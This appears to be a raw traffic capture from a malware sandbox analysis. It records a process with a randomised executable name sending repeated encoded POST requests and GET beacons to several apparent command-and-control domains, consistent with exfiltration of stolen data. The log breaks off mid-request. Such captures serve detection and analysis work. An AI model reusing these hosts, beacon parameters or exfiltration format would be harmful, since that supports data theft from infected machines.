                                                                        Host: www.seraph.best
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.seraph.best
                                                                        Referer: http://www.seraph.best/qfwu/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W=3dqRYCJm0jjQynXhJSJTCxsOzgIH3nSIWZ0I1MPgW51O0SI1Fd16IPJoM1sELSDzcfmQih6OHXKprSbKTCNrjciXPzr5kZ8iCa+VU7UI7Jm6OTcmxudzq/PB1yenLUGoo+NXcKhXBL7rs6t76FHN6e41bTLDLmJ9lWOXMGsDjsjeUCfc4W1WIBiwsk1iriWyRyRZBIs=
                                                                        Nov 7, 2024 10:10:09.152996063 CET | 303 | IN | HTTP/1.1 405 Not Allowed
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 09:10:09 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 154
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        2 | 192.168.2.5 | 49982 | 52.20.84.62 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:10:11.052347898 CET | 623 | OUT | POST /qfwu/ HTTP/1.1
                                                                        Host: www.seraph.best
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.seraph.best
                                                                        Referer: http://www.seraph.best/qfwu/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W=3dqRYCJm0jjQwHnhaldTWhsNqAIH9HSMWZ4I1N69WKBO0zY1EfN6PPJof1s7TyD4cfqiij+OHXuprTrKQxlohMiRDTr/gZ8iCa+VU7Qm7J+6NgEm+vd0jfPG2yendkGso+N1cL8KBJzrs+p76xrOze4zVzKcKUoz6VfZG0178/TaV0u2i09+bhOI839V6S3bLRBpff7MIBiolLQx0doEUgfBQKMe
                                                                        Nov 7, 2024 10:10:11.712697983 CET | 303 | IN | HTTP/1.1 405 Not Allowed
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 09:10:11 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 154
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        3 | 192.168.2.5 | 49983 | 52.20.84.62 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:10:13.597990036 CET | 1640 | OUT | POST /qfwu/ HTTP/1.1
                                                                        Host: www.seraph.best
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.seraph.best
                                                                        Referer: http://www.seraph.best/qfwu/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W= [TRUNCATED]
                                                                        Nov 7, 2024 10:10:14.596352100 CET | 303 | IN | HTTP/1.1 405 Not Allowed
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 09:10:14 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 154
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        4 | 192.168.2.5 | 49984 | 52.20.84.62 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:10:16.140602112 CET | 354 | OUT | GET /qfwu/?N6gPj2W=6fCxb2xLzjzF4nD7KjQhWEUB1Dc/xE2Ac7kR0Mi0XoRopjw7HNNCf6pSJ3AnVDHsLPCXmSmdJmWxpgfBXwwA4t7semSG378seryKT9cw4v33ezM47Ih1j5HvwkKKbWbCpg==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.seraph.best
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:10:17.809206963 CET | 359 | IN | HTTP/1.1 307 Temporary Redirect
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 09:10:17 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 168
                                                                        Connection: close
                                                                        Location: http://www.seraph.best/
                                                                        Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        5 | 192.168.2.5 | 49985 | 3.33.130.190 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:10:23.030611038 CET | 603 | OUT | POST /o5fg/ HTTP/1.1
                                                                        Host: www.owinvip.net
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.owinvip.net
                                                                        Referer: http://www.owinvip.net/o5fg/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W=0qPIPrHYuEl6D9Nh5TreenpzqMy0306FHzgPJl18RHyntbpDi0N71uSzLQKa5i8dfX3h74FW4SSGlMD99vUaF+YN4hTJwRoOuFtRH9hIVWI7VBAsvo8IaQEAxhk9YHbvTHYHrLywb7Ntshlj59su0rCuedS9oKb6cOhU0b+hREpJ5sTaWKRJVVZ+HVt72DMkW7K6Has=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        6 | 192.168.2.5 | 49986 | 3.33.130.190 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:10:25.573168993 CET | 623 | OUT | POST /o5fg/ HTTP/1.1
                                                                        Host: www.owinvip.net
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.owinvip.net
                                                                        Referer: http://www.owinvip.net/o5fg/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W=0qPIPrHYuEl6FuFh+0HeZHpypMy0+U6JHzsPJhknR1Wnt65Djx57yuSzDwKf3C8afXzf745W4SGGlMz99c8ZEuYPjRTPtBoOuFtRH5JiVWQ7V0Qsp6ULWwEDhxk9P3bjTHY1rPyWb9Rtsjtj3Mstv7CsadS2oPy2bPlY2Z6iFVxB4aiwMoZhG11GXGlMnztNMYaKZN6JHNLicwTXQa+2rVlXP+yU


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        7 | 192.168.2.5 | 49987 | 3.33.130.190 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:10:28.113079071 CET | 1640 | OUT | POST /o5fg/ HTTP/1.1
                                                                        Host: www.owinvip.net
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.owinvip.net
                                                                        Referer: http://www.owinvip.net/o5fg/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W= [TRUNCATED]


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        8 | 192.168.2.5 | 49988 | 3.33.130.190 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:10:30.657022953 CET | 354 | OUT | GET /o5fg/?N6gPj2W=5onoMf6BmQl2QeVt/VrvVQYA8O/0+XqHKAgaJU0renyYnLBIrjMEkLORFTCyyhU0JhHfx4R92TWl4c733/RJY99e60Kw3j0IgWhxS41JWxIsLFgO3NczRgQE1UQqfRS1SQ==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.owinvip.net
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:11:02.626003027 CET | 416 | IN | HTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 09:11:02 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 276
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?N6gPj2W=5onoMf6BmQl2QeVt/VrvVQYA8O/0+XqHKAgaJU0renyYnLBIrjMEkLORFTCyyhU0JhHfx4R92TWl4c733/RJY99e60Kw3j0IgWhxS41JWxIsLFgO3NczRgQE1UQqfRS1SQ==&yx-=dF9dYX9pQR-xIhFp"}</script></head></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        9 | 192.168.2.5 | 49989 | 172.96.191.232 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:11:07.697729111 CET | 630 | OUT | POST /9rsa/ HTTP/1.1
                                                                        Host: www.thefokusdong43.click
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.thefokusdong43.click
                                                                        Referer: http://www.thefokusdong43.click/9rsa/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W=BLykkFst/8KRIQQHAmCFoOdm5OCQlootWOk4DKPk9EALcaPtW/J4N6WddN6Vt5+L5rcOujhMTKsoPUHmFCs+a6ohiRDOQxExPeq7vO5KS2t8SGhrmBv4m/j54ZWukSbZP+eRbDdGKG8BSD6dlOVOc5I5oUoPgS2EYYxU0NzUEfV+JWTfwTl/gH9MeMuXn0IsuXHwM8o=
                                                                        Nov 7, 2024 10:11:08.701948881 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Thu, 07 Nov 2024 09:11:08 GMT
                                                                        server: LiteSpeed
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        10 | 192.168.2.5 | 49990 | 172.96.191.232 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:11:10.243113995 CET | 650 | OUT | POST /9rsa/ HTTP/1.1
                                                                        Host: www.thefokusdong43.click
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.thefokusdong43.click
                                                                        Referer: http://www.thefokusdong43.click/9rsa/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W=BLykkFst/8KRKxgHGB2FvudlyuCQvIopWOo4DI/O9S4Lc+LtX+J4M6WdSt6QgZ+A5sV7uidMTK4oPXTmFwE9aqoj6hDMPBExPeq7vOsCS218S3Rrmkb/4vj+vpWuyibdP+ejbB5gKFEBSGGdr/VRV5IzsUpfjTHeQeBj9rmpa/ZdIgi1qxtXznR0Ofmg2EpF00XASr+J9RWvwAdCJpeyhJInnCCv
                                                                        Nov 7, 2024 10:11:11.240986109 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Thu, 07 Nov 2024 09:11:11 GMT
                                                                        server: LiteSpeed
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        11 | 192.168.2.5 | 49991 | 172.96.191.232 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:11:12.794385910 CET | 1667 | OUT | POST /9rsa/ HTTP/1.1
                                                                        Host: www.thefokusdong43.click
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.thefokusdong43.click
                                                                        Referer: http://www.thefokusdong43.click/9rsa/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W= [TRUNCATED]
                                                                        Nov 7, 2024 10:11:13.799863100 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Thu, 07 Nov 2024 09:11:13 GMT
                                                                        server: LiteSpeed
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        12 | 192.168.2.5 | 49992 | 172.96.191.232 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:11:15.404628992 CET | 363 | OUT | GET /9rsa/?N6gPj2W=MJaEnwMoptGuAyQmB3iPl7F+p8qtmKUBGuoMdJ29iBxpANTscusPMMCgTv6bu6SX3cIivBJkXrMlI2rZEQxlLsosjm3OJjcrR+TIxZJDXxtdEHg1mRP53ezQuvD90TyBQQ==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.thefokusdong43.click
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:11:16.374053001 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Thu, 07 Nov 2024 09:11:16 GMT
                                                                        server: LiteSpeed
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        13 | 192.168.2.5 | 49993 | 3.33.130.190 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:11:21.637527943 CET | 624 | OUT | POST /6jke/ HTTP/1.1
                                                                        Host: www.spencermarcu.movie
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.spencermarcu.movie
                                                                        Referer: http://www.spencermarcu.movie/6jke/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W=mThf90WPqBvBnphA3JxNUUGDSbu97XJkNQKCNYccaDvJWE7ZCxxCMJTZgCp/cz8QKwEguke5BRqTI0gCKmvXRwAqBokQc/MqCyYDraX3R0Z3B/wLl8iFdj888gu4mu+dAx8tWVqqlfgcBgMuSlcZhPO01zvMnQKKSuRWNRivL4mhOD2w3Z4YDaAyING8p/fwL4aoQ8U=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        14 | 192.168.2.5 | 49994 | 3.33.130.190 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:11:24.176678896 CET | 644 | OUT | POST /6jke/ HTTP/1.1
                                                                        Host: www.spencermarcu.movie
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.spencermarcu.movie
                                                                        Referer: http://www.spencermarcu.movie/6jke/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W=mThf90WPqBvBmJxAyudNS0GAOLu913IjNQ2CNZYqbwbJWhfZD0NCBpTZvip6TT8lKwJVuli5BROTI0QCJVHYQgAoYYkWTfMqCyYDrazZR0B3BOALjdiaDz8z7gu4s+/UAx9CWU2AldocBkcuS0cWyvOyqDuYmi/aVckXJz3HdLbaL1Hat7wwQ6sKYeOL4P+ZRbKYOrAURIEWLTAclfl0oNtTenPw


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        15 | 192.168.2.5 | 49995 | 3.33.130.190 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:11:26.725045919 CET | 1661 | OUT | POST /6jke/ HTTP/1.1
                                                                        Host: www.spencermarcu.movie
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.spencermarcu.movie
                                                                        Referer: http://www.spencermarcu.movie/6jke/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W= [TRUNCATED]


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        16 | 192.168.2.5 | 49996 | 3.33.130.190 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:11:29.267080069 CET | 361 | OUT | GET /6jke/?N6gPj2W=rRJ/+EeoqQH1jv9h2PxYf0uEP5S/0RESCBDmMrxCZyLsd2TFJm1VUMTcv3pSTCQ1Dx8MnXqZSxSGPUkXGUSRGRBSA9xnN9k9eX0mqtLeTR1pd/EPiIm/QSAex0qPnPOTeQ==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.spencermarcu.movie
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:11:29.884881020 CET | 416 | IN | HTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 09:11:29 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 276
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?N6gPj2W=rRJ/+EeoqQH1jv9h2PxYf0uEP5S/0RESCBDmMrxCZyLsd2TFJm1VUMTcv3pSTCQ1Dx8MnXqZSxSGPUkXGUSRGRBSA9xnN9k9eX0mqtLeTR1pd/EPiIm/QSAex0qPnPOTeQ==&yx-=dF9dYX9pQR-xIhFp"}</script></head></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        17 | 192.168.2.5 | 49997 | 103.191.208.137 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:11:35.653068066 CET | 627 | OUT | POST /7ozt/ HTTP/1.1
                                                                        Host: www.roopiedutech.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.roopiedutech.online
                                                                        Referer: http://www.roopiedutech.online/7ozt/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W=kusbVJy7kNUeHkT7GcI/bnbcxhYg0nM+FQwKOHxgOPN+1MfsjCtjV0uXmM9ovoi/CwhuQQoEmczrjCWE9ffTFYNZsPw4QU1hMLHQRTkyWPnWPHaT2INgItbr05jFfIAM3CMbvzQzsOa4bxuO3oPWL7I6cFl8HTbPlm+UHpIWVjeSmuPjdCg6jkEVWjK3UrUPXCW6uZs=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        18 | 192.168.2.5 | 49998 | 103.191.208.137 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:11:38.225048065 CET | 647 | OUT | POST /7ozt/ HTTP/1.1
                                                                        Host: www.roopiedutech.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.roopiedutech.online
                                                                        Referer: http://www.roopiedutech.online/7ozt/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W=kusbVJy7kNUeIkj7H7k/eHbTtxYgv3MyFQMKODpwO8p+1tvsiDtjW0uXus9hxYjxCxcbQQUEmcnrjA+E+orQEINbjvw6f01hMLHQRX0IWP/WO3qT1sZjW9b0jJjFOYAI3CM1vydusIG4bxeO38bRF7I4YFkyGgrDgnWvMrJDEgSNu4+JHgoSwEotGwCAFb1mNhGKwO6cj6S7aK6kWSxce2Ro5PAq


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        19 | 192.168.2.5 | 49999 | 103.191.208.137 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:11:40.773072958 CET | 1664 | OUT | POST /7ozt/ HTTP/1.1
                                                                        Host: www.roopiedutech.online
                                                                        Accept: */*
